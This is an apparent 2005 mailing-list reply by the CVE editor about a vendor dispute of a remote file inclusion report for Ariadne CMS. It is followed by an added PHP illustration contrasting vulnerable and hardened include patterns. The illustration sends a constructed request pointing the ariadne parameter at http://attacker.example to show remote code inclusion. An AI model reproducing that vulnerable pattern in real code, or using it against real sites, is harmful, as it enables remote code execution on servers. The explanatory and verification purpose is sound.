[VIM] Re: CVE id: CAN-2005-1181
Steven M. Christey
coley at linus.mitre.org
Tue Jul 5 14:00:14 EDT 2005
I suppose the 10 million comment will bite me someday, but it seems to be
a reasonable estimate.
On Tue, 5 Jul 2005, Steven M. Christey wrote:
> On Mon, 4 Jul 2005, Gijsbert te Riet wrote:
> > Dear reader,
> > The vulnerability report on your site, titled 'Ariadne Include File Flaw
> > Lets Remote Users Execute Arbitrary Commands', is inaccurate.
> We have modified the
> > We regret that we were not informed about this 'flaw' before you
> > published it on your site, and had to find it by accident.
> Approximately 100 vulnerabilities per week are publicly reported, and it
> is estimated that full verification of each and every vulnerability report
> would likely cost in excess of 10 million dollars per year. Therefore it
> is not possible for us to verify every report.
> To see how difficult it is to find vendor acknowledgement for large
> numbers of vulnerabilities, please read the following report:
> "An informal analysis of vendor acknowledgement of vulnerabilities"
> Steve Christey, Barbara Pease
> However, we are always willing to post vendor disputes for inaccurate
> vulnerability information.
> I will forward your email to other vulnerability information sources so
> that they can make corrections. You might wish to send a post to the
> Bugtraq mailing list, which will reach a wide audience.
> I have modified the CVE candidate accordingly; see below. This will be on
> the CVE web site later today.
> > We hope you will update your entry with this information, and inform us the
> > next time an issue about one of our projects arises.
> We are working on an automated capability to help us do this. I will add
> your email address and the keyword "ariadne" to this capability.
> I apologize for the inconvenience and hope that our quick response is
> Steve Christey
> CVE Editor
> Candidate: CAN-2005-1181
> URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1181
> Reference: OSVDB:15549
> Reference: URL:http://www.osvdb.org/15549
> Reference: SECTRACK:1013721
> Reference: URL:http://securitytracker.com/id?1013721
> Reference: XF:ariadne-loaderphp-file-include(20611)
> Reference: URL:http://xforce.iss.net/xforce/xfdb/20611
> ** DISPUTED **
> NOTE: this issue has been disputed by the vendor. PHP remote code
> injection vulnerability in loader.php for Ariadne CMS 2.4 allows
> remote attackers to execute arbitrary PHP code by modifying the
> ariadne parameter to reference a URL on a remote web server that
> contains the code. NOTE: the vendor has disputed this issue, saying
> that loader.php first requires the "ariadne.inc" file, which defines
> the $ariadne variable, and thus it cannot be modified by an attacker.
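The two code shapes at the centre of the dispute, as an added illustration that is not part of the original thread and not Ariadne's own code. The file names loader.php and ariadne.inc come from the CVE text; the included sub-path, the simulated request, the install path and the function names are assumptions. The vulnerable shape is the one the original report presumed (a register_globals-supplied $ariadne used directly in an include); the second shape is what the vendor describes (ariadne.inc assigns $ariadne before it is used, so a request-supplied value is overwritten).

```php
<?php
// Added illustration of the CAN-2005-1181 dispute. Not Ariadne's code.
// Assumed: the '/lib/loader.inc' sub-path, the install path below, and
// the use of extract() to stand in for PHP 4's register_globals.

// Pattern the original report assumed (vulnerable remote file inclusion).
// With register_globals=On, a request like
//   loader.php?ariadne=http://attacker.example   (constructed example)
// creates $ariadne before any code in loader.php runs. If loader.php then
// includes $ariadne . '/lib/loader.inc' without reassigning $ariadne, PHP
// fetches and executes that file from the attacker's host, provided
// allow_url_fopen (PHP 4) / allow_url_include (PHP >= 5.2) permits URLs.
function vulnerable_include_path(array $request): string
{
    // Simulate register_globals: every request parameter becomes a variable.
    extract($request, EXTR_OVERWRITE);
    // $ariadne is whatever the client sent, so the include target is
    // attacker-controlled. (Returned as a string here instead of included.)
    return $ariadne . '/lib/loader.inc';
}

// Stand-in for `require 'ariadne.inc';`, which in the vendor's description
// is the first thing loader.php does and is what defines $ariadne.
function require_ariadne_inc(): string
{
    return '/var/www/ariadne';   // assumed install path set by ariadne.inc
}

// Pattern the vendor describes (not exploitable through the ariadne parameter).
// register_globals still populates $ariadne from the request, but the
// require of ariadne.inc runs afterwards and overwrites it, so by the time
// the include executes the path is the configured one.
function hardened_include_path(array $request): string
{
    extract($request, EXTR_OVERWRITE);   // attacker-supplied $ariadne ...
    $ariadne = require_ariadne_inc();    // ... replaced before first use
    return $ariadne . '/lib/loader.inc';
}

// Verification check a reviewer could run against either shape: the final
// include target must stay under the configured install directory and must
// not carry a URL scheme. This is an added sanity check, not Ariadne's code.
function include_path_is_local(string $path, string $base): bool
{
    return preg_match('#^[a-z][a-z0-9+.-]*://#i', $path) === 0
        && strncmp($path, rtrim($base, '/') . '/', strlen($base) + 1) === 0;
}

$request = ['ariadne' => 'http://attacker.example'];   // constructed request

$vuln = vulnerable_include_path($request);
$safe = hardened_include_path($request);

echo "report's assumed shape includes: $vuln (local: ",
     var_export(include_path_is_local($vuln, '/var/www/ariadne'), true), ")\n";
echo "vendor's described shape includes: $safe (local: ",
     var_export(include_path_is_local($safe, '/var/www/ariadne'), true), ")\n";
```

When verifying a report of this kind, the question to settle is the one the vendor raises: does the assignment of the variable (here by the required ariadne.inc) execute before its first use in an include, and is the assignment unconditional? If both hold, a request-supplied value cannot survive to the include regardless of register_globals; if the require is conditional or comes after the include, the original report's reading applies.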